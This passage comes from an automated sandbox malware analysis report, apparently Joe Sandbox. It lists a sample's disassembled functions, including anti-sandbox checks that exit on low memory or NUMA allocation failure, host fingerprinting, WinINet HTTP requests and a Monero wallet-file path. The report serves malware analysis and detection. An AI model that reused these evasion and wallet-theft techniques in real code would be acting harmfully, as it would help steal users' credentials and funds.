                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: b2912364755ff8b94623d64c026b2eee13ca6cbd90dedcda7136c970f4a7daad
                              • Instruction ID: e4cd6e1324be0ea61242e653f41c3d5b290f96ca5ff5865dc2a78d1ff9c28c72
                              • Opcode Fuzzy Hash: b2912364755ff8b94623d64c026b2eee13ca6cbd90dedcda7136c970f4a7daad
                              • Instruction Fuzzy Hash: 39516CB4A04209EFEB06DFA5D948BBE77B5BF44704F00805CE486AB288D774EA41CB61
                              Function 01007500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 1007500-100754a GetWindowsDirectoryA 1357 1007553-10075c7 GetVolumeInformationA call 1008d00 * 3 1356->1357 1358 100754c 1356->1358 1365 10075d8-10075df 1357->1365 1358->1357 1366 10075e1-10075fa call 1008d00 1365->1366 1367 10075fc-1007617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 1007628-1007658 wsprintfA call 100a740 1367->1368 1369 1007619-1007626 call 100a740 1367->1369 1377 100767e-100768e 1368->1377 1369->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 01007542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0100757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0100760A
                              • wsprintfA.USER32 ref: 01007640
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 8992bb36c4396dabdeb03d25a9b00f53c2ad89cd3b1977a49ae5bae8c86003d1
                              • Instruction ID: a4b1871dfcf18f63827ea401ac43dd555cc2bf29e2dc5fc94af3f9e40847a2e6
                              • Opcode Fuzzy Hash: 8992bb36c4396dabdeb03d25a9b00f53c2ad89cd3b1977a49ae5bae8c86003d1
                              • Instruction Fuzzy Hash: 774185B1D04248ABEF11DF94DC44BDEB7B4BF18704F004199E549A72C0D7796A44CFA5
                              Function 010069F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981718), ref: 010098A1
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019817D8), ref: 010098BA
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019816D0), ref: 010098D2
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981730), ref: 010098EA
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981580), ref: 01009903
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01988A30), ref: 0100991B
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01975650), ref: 01009933
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019753B0), ref: 0100994C
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981598), ref: 01009964
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019816E8), ref: 0100997C
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019815C8), ref: 01009995
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,019815E0), ref: 010099AD
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01975670), ref: 010099C5
                                • Part of subcall function 01009860: GetProcAddress.KERNEL32(76210000,01981610), ref: 010099DE
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 00FF11D0: ExitProcess.KERNEL32 ref: 00FF1211
                                • Part of subcall function 00FF1160: GetSystemInfo.KERNEL32(?), ref: 00FF116A
                                • Part of subcall function 00FF1160: ExitProcess.KERNEL32 ref: 00FF117E
                                • Part of subcall function 00FF1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF112B
                                • Part of subcall function 00FF1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF1132
                                • Part of subcall function 00FF1110: ExitProcess.KERNEL32 ref: 00FF1143
                                • Part of subcall function 00FF1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FF123E
                                • Part of subcall function 00FF1220: __aulldiv.LIBCMT ref: 00FF1258
                                • Part of subcall function 00FF1220: __aulldiv.LIBCMT ref: 00FF1266
                                • Part of subcall function 00FF1220: ExitProcess.KERNEL32 ref: 00FF1294
                                • Part of subcall function 01006770: GetUserDefaultLangID.KERNEL32 ref: 01006774
                                • Part of subcall function 00FF1190: ExitProcess.KERNEL32 ref: 00FF11C6
                                • Part of subcall function 01007850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FF11B7), ref: 01007880
                                • Part of subcall function 01007850: RtlAllocateHeap.NTDLL(00000000), ref: 01007887
                                • Part of subcall function 01007850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0100789F
                                • Part of subcall function 010078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007910
                                • Part of subcall function 010078E0: RtlAllocateHeap.NTDLL(00000000), ref: 01007917
                                • Part of subcall function 010078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0100792F
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01988920,?,0101110C,?,00000000,?,01011110,?,00000000,01010AEF), ref: 01006ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01006AE8
                              • CloseHandle.KERNEL32(00000000), ref: 01006AF9
                              • Sleep.KERNEL32(00001770), ref: 01006B04
                              • CloseHandle.KERNEL32(?,00000000,?,01988920,?,0101110C,?,00000000,?,01011110,?,00000000,01010AEF), ref: 01006B1A
                              • ExitProcess.KERNEL32 ref: 01006B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 02a1563233bcc2db96131f53dbd8b2ab7e563c40d899da65d6bdd4ff542614ad
                              • Instruction ID: 91b2ad29e205da2f473b65f1bbd00e984e479a70747d94d2808d4a5299ec686e
                              • Opcode Fuzzy Hash: 02a1563233bcc2db96131f53dbd8b2ab7e563c40d899da65d6bdd4ff542614ad
                              • Instruction Fuzzy Hash: E6310D71A1020AEAFB06FBF0EC55BEE7779AF24300F004528E282A71D0DF756645CBA1
                              Function 00FF1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 ff1220-ff1247 call 10089b0 GlobalMemoryStatusEx 1439 ff1249-ff1271 call 100da00 * 2 1436->1439 1440 ff1273-ff127a 1436->1440 1442 ff1281-ff1285 1439->1442 1440->1442 1444 ff129a-ff129d 1442->1444 1445 ff1287 1442->1445 1447 ff1289-ff1290 1445->1447 1448 ff1292-ff1294 ExitProcess 1445->1448 1447->1444 1447->1448
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FF123E
                              • __aulldiv.LIBCMT ref: 00FF1258
                              • __aulldiv.LIBCMT ref: 00FF1266
                              • ExitProcess.KERNEL32 ref: 00FF1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 00df8e0307db6e94b0de0f19d98cb35f47b6a950cffc7f0084daace3ea4d6e9a
                              • Instruction ID: 63f67d3b5a8729069348b4996529b8140a8f52f505de41e91e074608884ed728
                              • Opcode Fuzzy Hash: 00df8e0307db6e94b0de0f19d98cb35f47b6a950cffc7f0084daace3ea4d6e9a
                              • Instruction Fuzzy Hash: C5014BB0D40308EAEB10EFE0DC49BAEBB78BF14701F208059E705B62C0D77455459799
                              Function 01006AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 1006af3 1451 1006b0a 1450->1451 1453 1006aba-1006ad7 call 100aad0 OpenEventA 1451->1453 1454 1006b0c-1006b22 call 1006920 call 1005b10 CloseHandle ExitProcess 1451->1454 1460 1006af5-1006b04 CloseHandle Sleep 1453->1460 1461 1006ad9-1006af1 call 100aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01988920,?,0101110C,?,00000000,?,01011110,?,00000000,01010AEF), ref: 01006ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01006AE8
                              • CloseHandle.KERNEL32(00000000), ref: 01006AF9
                              • Sleep.KERNEL32(00001770), ref: 01006B04
                              • CloseHandle.KERNEL32(?,00000000,?,01988920,?,0101110C,?,00000000,?,01011110,?,00000000,01010AEF), ref: 01006B1A
                              • ExitProcess.KERNEL32 ref: 01006B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 246c4d0ad31a8cacb4b4b1d4c81679ba163d82fb8d80ce3ac83cd9bb8441e16c
                              • Instruction ID: d539156dfa384a1038614198c41a765d86d612026f7755623bc4ced8962b70c2
                              • Opcode Fuzzy Hash: 246c4d0ad31a8cacb4b4b1d4c81679ba163d82fb8d80ce3ac83cd9bb8441e16c
                              • Instruction Fuzzy Hash: 4DF05E70A4030AEFF712BBA0EC19BBE7B75EB14701F004524A583A21C0CBB15580CB55
                              Function 00FF47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 0c2e3f183a4d763deed15684468af3f31a9d67d3151be181c68dfabf53176e39
                              • Instruction ID: 5c90a3d5e6ccd2d59d8c5d4b06e8eb5a7755c0aaf954e78a7a5ed1ae75fea714
                              • Opcode Fuzzy Hash: 0c2e3f183a4d763deed15684468af3f31a9d67d3151be181c68dfabf53176e39
                              • Instruction Fuzzy Hash: FE2121B1D00209ABDF14DFA4E849BEE7B75FF45320F108625E955A72D0EB706A09CF91
                              Function 010051F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF6280: InternetOpenA.WININET(01010DFE,00000001,00000000,00000000,00000000), ref: 00FF62E1
                                • Part of subcall function 00FF6280: StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF6303
                                • Part of subcall function 00FF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF6335
                                • Part of subcall function 00FF6280: HttpOpenRequestA.WININET(00000000,GET,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF6385
                                • Part of subcall function 00FF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FF63BF
                                • Part of subcall function 00FF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01005228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: f71305ba7dca5f5aaa6fff82815fb7495a4178f5293d398f48922300adb5e53f
                              • Instruction ID: be956642f3eefec9422a6eb93280587fb6a1b65b0fe68cd824bbe761a437c218
                              • Opcode Fuzzy Hash: f71305ba7dca5f5aaa6fff82815fb7495a4178f5293d398f48922300adb5e53f
                              • Instruction Fuzzy Hash: F0112E30A00209EBEB15FF74DD51EED7338AF60200F408158E94A4B5D1EF74AB09CB90
                              Function 010078E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01007917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0100792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 133b105d166e1e6c7021dc4157f07bb46b27277c12c26598f718cca1dc55bd21
                              • Instruction ID: 6332d8f5b5f38eeb7ca629cf0383c3200714e925c07f9f6e9a489be49b9466c4
                              • Opcode Fuzzy Hash: 133b105d166e1e6c7021dc4157f07bb46b27277c12c26598f718cca1dc55bd21
                              • Instruction Fuzzy Hash: 6B0186B1904204EBD710DF99D949BAEBBB8F704B21F104269F5C5E3280C37855048BA1
                              Function 00FF1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF1132
                              • ExitProcess.KERNEL32 ref: 00FF1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
